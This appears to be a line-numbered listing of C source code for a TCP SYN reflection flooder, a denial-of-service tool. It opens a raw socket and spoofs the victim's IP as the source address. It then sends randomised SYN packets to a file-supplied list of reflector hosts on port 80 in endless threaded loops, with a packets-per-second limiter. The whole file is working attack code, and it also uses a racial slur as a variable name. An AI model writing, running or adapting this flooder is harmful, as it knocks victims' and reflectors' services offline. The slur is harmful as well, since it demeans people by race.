V2

1. // port 80 tcp amp only for amp list
2.  
3. #include <unistd.h>
4. #include <time.h>
5. #include <sys/types.h>
6. #include <sys/socket.h>
7. #include <sys/ioctl.h>
8. #include <string.h>
9. #include <stdlib.h>
10. #include <stdio.h>
11. #include <pthread.h>
12. #include <netinet/tcp.h>
13. #include <netinet/ip.h>
14. #include <netinet/in.h>
15. #include <netinet/if_ether.h>
16. #include <netdb.h>
17. #include <net/if.h>
18. #include <arpa/inet.h>
19. #define MAX_PACKET_SIZE 4096
20. #define PHI 0x9e3779b9
21. static unsigned long int Q[4096], c = 362436;
22. static unsigned int floodport;
23. struct list
24. {
25. struct sockaddr_in data;
26. struct list *next;
27. struct list *prev;
28. };
29. struct list *head;
30. volatile int limiter;
31. volatile unsigned int pps;
32. volatile unsigned int sleeptime = 100;
33. struct thread_data{ int thread_id; int dport; struct list *list_node; struct sockaddr_in sin; };
34. void init_rand(unsigned long int x)
35. {
36. int i;
37. Q[0] = x;
38. Q[1] = x + PHI;
39. Q[2] = x + PHI + PHI;
40. for (i = 3; i < 4096; i++){ Q[i] = Q[i] ^ Q[i] ^ PHI ^ i; }
41. }
42. unsigned long int rand_cmwc(void)
43. {
44. unsigned long long int t, a = 18782LL;
45. static unsigned long int i = 4095;
46. unsigned long int x, r = 0xfffffffe;
47. i = (i + 1) & 4095;
48. t = a * Q[i] + c;
49. c = (t >> 32);
50. x = t + c;
51. if (x < c) {
52. x++;
53. c++;
54. }
55. return (Q[i] = r - x);
56. }
57. int randnum(int min_num, int max_num)
58. {
59. int result = 0, low_num = 0, hi_num = 0;
60.  
61. if (min_num < max_num)
62. {
63. low_num = min_num;
64. hi_num = max_num + 1;
65. } else {
66. low_num = max_num + 1;
67. hi_num = min_num;
68. }
69.  
70.  
71. result = (rand_cmwc() % (hi_num - low_num)) + low_num;
72. return result;
73. }
74. unsigned short csum (unsigned short *buf, int count)
75. {
76. register unsigned long sum = 0;
77. while( count > 1 ) { sum += *buf++; count -= 2; }
78. if(count > 0) { sum += *(unsigned char *)buf; }
79. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
80. return (unsigned short)(~sum);
81. }
82. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph, int pipisize) {
83. struct tcp_pseudo
84. {
85. unsigned long src_addr;
86. unsigned long dst_addr;
87. unsigned char zero;
88. unsigned char proto;
89. unsigned short length;
90. } pseudohead;
91. unsigned short total_len = iph->tot_len;
92. pseudohead.src_addr=iph->saddr;
93. pseudohead.dst_addr=iph->daddr;
94. pseudohead.zero=0;
95. pseudohead.proto=IPPROTO_TCP;
96. pseudohead.length=htons(sizeof(struct tcphdr) + pipisize);
97. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr) + pipisize;
98. unsigned short *tcp = malloc(totaltcp_len);
99. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
100. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr) + pipisize);
101. unsigned short output = csum(tcp,totaltcp_len);
102. free(tcp);
103. return output;
104. }
105. void setup_ip_header(struct iphdr *iph)
106. {
107. iph->ihl = 5;
108. iph->version = 4;
109. iph->tos = 0;
110. iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr) + 24;
111. iph->id = htonl(54321);
112. iph->frag_off = htons(0x4000);
113. iph->ttl = 255;
114. iph->protocol = IPPROTO_TCP;
115. iph->check = 0;
116. iph->saddr = inet_addr("192.168.3.100");
117. }
118. void setup_tcp_header(struct tcphdr *tcph)
119. {
120. tcph->source = htons(80);
121. tcph->check = 0;
122. memcpy((void *)tcph + sizeof(struct tcphdr), "\x02\x04\x05\xb4\x04\x02\x08\x0a\x00\xd9\x68\xa3\x04\x02\x08\x0a\x00\xd9\x68\xa3\x00\x04\x02\x08\x0a\x00\xd9\x68\xa3\x00\x00\x00\x00\x00\x01\x03\x03\x07\xfe\x04\xf9\x89", 24); // tcp options
123. //memcpy((void *)tcph + sizeof(struct tcphdr) + 24, "\x55\x53\x45\x52\x20\x63\x04\x02\x08\x0a\x00\xd9\x68\xa3\x00\x04\x02\x08\x0a\x00\xd9\x68\xa3\x00\x73\x61\x6e\x64\x65\x72\x73\x0d\x0a", 15);
124. tcph->syn = 1;
125. tcph->window = htons(64240);
126. tcph->doff = ((sizeof (struct tcphdr)) + 24)/4;
127. }
128. void *flood(void *par1)
129. {
130. struct thread_data *td = (struct thread_data *)par1;
131. char datagram[MAX_PACKET_SIZE];
132. struct iphdr *iph = (struct iphdr *)datagram;
133. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
134. struct sockaddr_in sin = td->sin;
135. struct list *list_node = td->list_node;
136. int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
137. if(s < 0){
138. fprintf(stderr, "Could not open raw socket.\n");
139. exit(-1);
140. }
141. memset(datagram, 0, MAX_PACKET_SIZE);
142. setup_ip_header(iph);
143. setup_tcp_header(tcph);
144. tcph->dest = htons(21);
145. iph->saddr = sin.sin_addr.s_addr;
146. iph->check = csum ((unsigned short *) datagram, iph->tot_len);
147. int tmp = 1;
148. int niggershot = 30120;
149. const int *val = &tmp;
150. if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
151. fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
152. exit(-1);
153. }
154. init_rand(time(NULL));
155. register unsigned int i;
156. i = 0;
157. while(1){
158. tcph->check = 0;
159. tcph->seq = htonl(rand_cmwc() & 0xFFFFFFFFF);
160. tcph->doff = ((sizeof (struct tcphdr)) + 24)/4;
161. tcph->dest = htons(80);
162. iph->ttl = 255;
163. //iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
164. list_node = list_node->next;
165. iph->daddr = list_node->data.sin_addr.s_addr;
166. iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
167. iph->check = csum ((unsigned short *) datagram, iph->tot_len);
168. tcph->source = htons(rand_cmwc() & 0xFFFF);
169. //tcph->source = htons(td->dport);
170. tcph->dest = htons(80);
171. tcph->check = tcpcsum(iph, tcph, 24);
172. sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
173. //packet edit
174. int windows[3] = {29200, 64240, 65535};
175. int ctos[3] = {0, 40, 72};
176. iph->tos = ctos[randnum(0,2)];
177. char stronka[] = "\x02\x04\x05\xb4\x04\x02\x08\x0a\x00\xd9\x68\xa3\x00\x00\x00\x00\x01\x03\x03\x07\xfe\x04\xf9\x89";
178. stronka[2] = randnum(4, 5);
179. stronka[3] = stronka[2] == 5 ? randnum(1, 180) : randnum(1, 250);
180. stronka[7] = 10;
181. stronka[8] = randnum(1, 250);
182. stronka[17] = 3;
183. stronka[18] = 3;
184. stronka[19] = randnum(6,9);
185. stronka[20] = 34;
186. stronka[22] = randnum(1,255);
187. stronka[23] = randnum(1,255);
188. tcph->window = htons(windows[randnum(0,2)]);
189. const char *newpayload = stronka;
190. memcpy((void *)tcph + sizeof(struct tcphdr), newpayload, 24);
191. pps++;
192. if(i >= limiter)
193. {
194. i = 0;
195. usleep(sleeptime);
196. }
197. i++;
198. }
199. }
200. int main(int argc, char *argv[ ])
201. {
202. if(argc < 6){
203. fprintf(stderr, "Invalid parameters!\n");
204. fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
205. exit(-1);
206. }
207. srand(time(NULL));
208. int i = 0;
209. head = NULL;
210. fprintf(stdout, "Setting up sockets...\n");
211. int floodport = atoi(argv[2]);
212. int max_len = 512;
213. char *buffer = (char *) malloc(max_len);
214. buffer = memset(buffer, 0x00, max_len);
215. int num_threads = atoi(argv[4]);
216. int maxpps = atoi(argv[5]);
217. limiter = 0;
218. pps = 0;
219. int multiplier = 100;
220. FILE *list_fd = fopen(argv[3], "r");
221. while (fgets(buffer, max_len, list_fd) != NULL) {
222. if ((buffer[strlen(buffer) - 1] == '\n') ||
223. (buffer[strlen(buffer) - 1] == '\r')) {
224. buffer[strlen(buffer) - 1] = 0x00;
225. if(head == NULL)
226. {
227. head = (struct list *)malloc(sizeof(struct list));
228. bzero(&head->data, sizeof(head->data));
229. head->data.sin_addr.s_addr=inet_addr(buffer);
230. head->next = head;
231. head->prev = head;
232. } else {
233. struct list *new_node = (struct list *)malloc(sizeof(struct list));
234. memset(new_node, 0x00, sizeof(struct list));
235. new_node->data.sin_addr.s_addr=inet_addr(buffer);
236. new_node->prev = head;
237. new_node->next = head->next;
238. head->next = new_node;
239. }
240. i++;
241. } else {
242. continue;
243. }
244. }
245. struct list *current = head->next;
246. pthread_t thread[num_threads];
247. struct sockaddr_in sin;
248. sin.sin_family = AF_INET;
249. sin.sin_addr.s_addr = inet_addr(argv[1]);
250. struct thread_data td[num_threads];
251. for(i = 0;i<num_threads;i++){
252. td[i].thread_id = i;
253. td[i].sin= sin;
254. td[i].dport= floodport;
255. td[i].list_node = current;
256. pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
257. }
258. fprintf(stdout, "Starting flood...\n");
259. for(i = 0;i<(atoi(argv[6])*multiplier);i++)
260. {
261. usleep((1024/multiplier)*1024);
262. if((pps*multiplier) > maxpps)
263. {
264. if(1 > limiter)
265. {
266. sleeptime+=100;
267. } else {
268. limiter--;
269. }
270. } else {
271. limiter++;
272. if(sleeptime > 25)
273. {
274. sleeptime-=25;
275. } else {
276. sleeptime = 0;
277. }
278. }
279. pps = 0;
280. }
281. return 0;
282. }